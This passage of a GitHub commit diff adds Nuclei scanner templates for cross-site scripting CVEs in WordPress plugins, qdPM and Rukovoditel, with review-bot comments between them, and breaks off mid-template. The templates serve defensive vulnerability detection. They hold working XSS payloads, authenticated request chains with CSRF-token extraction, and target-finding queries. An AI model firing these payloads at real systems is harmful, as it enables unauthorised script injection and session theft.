Merge pull request #7637 from projectdiscovery/cve-templates4

CVEs added
patch-1
pussycat0x 2023-07-07 16:46:09 +05:30 committed by GitHub
commit cb6eaf95a2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
44 changed files with 2262 additions and 4 deletions


@ -0,0 +1,42 @@
id: CVE-2019-14789
info:
name: Custom 404 Pro < 3.2.8 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/81ee1df5-12dc-49d8-8d49-ca28d6f5b7fd
- https://wordpress.org/plugins/custom-404-pro/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2019-14789
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-14789
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
- 'contains(body_2, "Custom 404 Pro")'
condition: and
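Review bot: The tags line `tags: cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss` files a 2019 CVE under `cve2023`; it should be `cve2019` so year-based tag filtering still picks this template up. The `name` also says `< 3.2.8` while the description says `before 3.2.9` — one of the two is wrong, and the referenced advisory should decide which. `max-request` is not set here although this is a two-request flow; the qdPM template in the same commit sets it for its raw requests, so `max-request: 2` would keep the metadata consistent.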


@ -0,0 +1,70 @@
id: CVE-2019-8390
info:
name: qdPM 9.1 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter.
reference:
- https://www.exploit-db.com/exploits/46399/
- http://qdpm.net/download-qdpm-free-project-management
- https://nvd.nist.gov/vuln/detail/CVE-2019-8390
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-8390
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.favicon.hash:762074255
max-request: 3
tags: cve,cve2019,xss,qdpm,authenticated,edb
http:
- raw:
- |
GET /index.php/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=
- |
POST /index.php/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
search[keywords]=e"><script>alert(document.domain)</script>&search_by_extrafields[]=9
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'alert alert-info alert-search-result'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
extractors:
- type: regex
name: csrf
part: body
group: 1
regex:
- 'name="login\[_csrf_token\]" value="(.*?)"'
internal: true
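Review bot: The `name` `qdPM 9.1 - Cross-site Scripting` is identical to the one CVE-2020-19515 uses later in this commit, so scan output cannot tell the two findings apart by name alone; something like `qdPM 9.1 - Cross-Site Scripting (search keywords)` here and `qdPM 9.1 - Installer Cross-Site Scripting` for the sibling would disambiguate them. The csrf extractor's non-greedy `(.*?)` and the `max-request: 3` matching the three raw requests are the pattern the other multi-step templates in this commit should follow.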


@ -0,0 +1,44 @@
id: CVE-2020-19515
info:
name: qdPM 9.1 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php.
reference:
- https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting
- http://qdpm.net/download-qdpm-free-project-management
- https://nvd.nist.gov/vuln/detail/CVE-2020-19515
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-19515
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.favicon.hash:762074255
tags: cve,cve2020,xss,qdpm,unauth
http:
- method: GET
path:
- "{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain) />'
- 'qdPM'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200


@ -0,0 +1,60 @@
id: CVE-2020-35984
info:
name: Rukovoditel <= 2.7.2 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter.
reference:
- https://github.com/r0ck3t1973/rukovoditel/issues/4
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35984
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-35984
cwe-id: CWE-79
metadata:
verified: "true"
shodan-query: http.favicon.hash:-1499940355
max-request: 3
tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true
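Review bot: `verified: "true"` is a quoted string here while the other templates in the commit write the boolean `verified: true`; the quoted form recurs in CVE-2020-35986, CVE-2022-43164 and CVE-2022-43167, and any consumer that type-checks metadata will treat the two differently, so all four should use the bare boolean. The DSL matcher here asserts only status and body, whereas the sibling CVE-2020-35985 also requires `contains(content_type_3, "text/html")` — that check is what separates a script tag rendered in an HTML page from the same bytes echoed in a JSON or plain-text response, and the templates without it (this one, CVE-2020-35986, CVE-2022-43164, CVE-2022-43167) should add it for consistency and to reduce false positives.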


@ -0,0 +1,59 @@
id: CVE-2020-35985
info:
name: Rukovoditel <= 2.7.2 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
reference:
- https://github.com/r0ck3t1973/rukovoditel/issues/3
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35985
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-35985
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=global_lists/lists&action=save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true
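Review bot: The description's `'Global Lists"` opens with a single quote and closes with a double quote; it should read `'Global Lists'` like the other feature names quoted in these descriptions. `max-request` is absent here although the flow is the same three raw requests for which CVE-2020-35984 declares `max-request: 3`; the same omission applies to CVE-2020-35987, CVE-2022-43165, CVE-2022-43166, CVE-2022-43169, CVE-2022-43170, CVE-2022-43185, CVE-2022-44944, CVE-2022-44946, CVE-2022-44947 and CVE-2022-44948 in this commit.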


@ -0,0 +1,60 @@
id: CVE-2020-35986
info:
name: Rukovoditel <= 2.7.2 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
reference:
- https://github.com/r0ck3t1973/rukovoditel/issues/2
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35986
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-35986
cwe-id: CWE-79
metadata:
verified: "true"
shodan-query: http.favicon.hash:-1499940355
max-request: 3
tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true


@ -0,0 +1,59 @@
id: CVE-2020-35987
info:
name: Rukovoditel <= 2.7.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
reference:
- https://github.com/r0ck3t1973/rukovoditel/issues/1
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35987
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-35987
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/&action=save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
internal: true
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
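Review bot: The nonce extractor `'id="form_session_token" value="(.*)" type="hidden"'` uses a greedy `(.*)`; if the login page ever places a second `type="hidden"` input on the same line, the capture swallows both and the login POST carries a corrupt token, so `value="(.*?)"` is the safer form — the qdPM template in this commit already uses the non-greedy variant. The same regex is shared by every Rukovoditel template in the commit, so the change applies to all of them. The ordering of `internal: true` before `group` here (and in CVE-2022-43169, CVE-2022-43185, CVE-2022-44946, CVE-2022-44948) differs from the siblings that put it last; harmless, but worth normalising while touching the extractor.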


@ -0,0 +1,34 @@
id: CVE-2022-4295
info:
name: Show all comments < 7.0.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.
reference:
- https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56
- https://nvd.nist.gov/vuln/detail/CVE-2022-4295
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-4295
cwe-id: CWE-79
metadata:
verified: true
publicwww-query: /wp-content/plugins/show-all-comments-in-one-page
tags: cve,cve2022,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>")'
- 'contains(body, "Select </option>")'
condition: and
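Review bot: The description reads `could be used against a logged in high privilege users such as admin`, which mixes singular and plural; `could be used against logged-in high-privilege users such as an admin` is cleaner. The tags omit `authenticated`, which matches the request being a session-less `admin-ajax.php` call, but the description implies a logged-in victim — a short sentence noting that the reflection itself needs no session would make the template's scope explicit.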


@ -0,0 +1,61 @@
id: CVE-2022-43164
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add".
reference:
- https://github.com/anhdq201/rukovoditel/issues/4
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-43164
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-43164
cwe-id: CWE-79
metadata:
verified: "true"
shodan-query: http.favicon.hash:-1499940355
max-request: 3
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true


@ -0,0 +1,60 @@
id: CVE-2022-43165
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create".
reference:
- https://github.com/anhdq201/rukovoditel/issues/5
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-43165
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-43165
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.favicon.hash:-1499940355
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=&sort_order=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true


@ -0,0 +1,60 @@
id: CVE-2022-43166
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Entity".
reference:
- https://github.com/anhdq201/rukovoditel/issues/2
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-43166
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-43166
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true
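Review bot: The third request posts to `module=entities/&action=save` while the description cites `/index.php?module=entities/entities`; I cannot tell from the template which form the application expects. If the trailing-slash form is intentional (resolving to the same controller, as CVE-2020-35987 in this commit also assumes), a brief comment on the request saying so would save the next maintainer a check; otherwise the path should match the description.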


@ -0,0 +1,60 @@
id: CVE-2022-43167
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add".
reference:
- https://github.com/anhdq201/rukovoditel/issues/7
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-43167
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-43167
cwe-id: CWE-79
metadata:
verified: "true"
shodan-query: http.favicon.hash:-1499940355
max-request: 3
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true


@ -0,0 +1,59 @@
id: CVE-2022-43169
info:
name: Rukovoditel <= 3.2.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Group".
reference:
- https://github.com/anhdq201/rukovoditel/issues/3
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-43169
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-43169
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&notes=&ldap_filter=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
internal: true
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'


@ -0,0 +1,60 @@
id: CVE-2022-43170
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add info block".
reference:
- https://github.com/anhdq201/rukovoditel/issues/6
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-43170
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-43170
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true


@ -0,0 +1,59 @@
id: CVE-2022-43185
info:
name: Rukovoditel <= 3.2.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add".
reference:
- https://github.com/anhdq201/rukovoditel/issues/1
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-43185
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-43185
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
internal: true
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
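Review bot: The description is copied from CVE-2022-43164 (`Global Lists feature (/index.php?module=global_lists/lists) ... Name parameter after clicking "Add"`), but the third request targets `module=holidays/holidays`, so the description no longer says what this template exercises; it should name the Holidays feature and the field the payload is stored in. The hard-coded `start_date=2023-05-22&end_date=2023-05-31` may also be rejected if the application validates the range against the current date, which I cannot confirm from here — worth a comment on why those dates were chosen.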


@ -0,0 +1,61 @@
id: CVE-2022-44944
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.
reference:
- https://github.com/anhdq201/rukovoditel/issues/14
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44944
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44944
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.favicon.hash:-1499940355
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(content_type_3, "text/html")'
- 'contains(body_3, "<script>alert(document.domain)</script>")'
- 'contains(body_3, "rukovoditel")'
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'id="form_session_token" value="(.*)" type="hidden"'
internal: true
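Review bot: `entities_id=24` in the request path and again in the description is an instance-specific identifier; unless it is fixed for the built-in help-pages entity on every install, the template misses installs where the id differs and should either extract it from the application or document why 24 is stable. The same literal appears in CVE-2022-44946 and CVE-2022-44947 (and in the CVE-2022-44949 multipart body), and CVE-2022-44947 additionally hard-codes `fields_id=193&fields_values%5B%5D=67`, which looks even more tied to the author's test instance.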


@ -0,0 +1,61 @@
id: CVE-2022-44946
info:
name: Rukovoditel <= 3.2.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.
reference:
- https://github.com/anhdq201/rukovoditel/issues/15
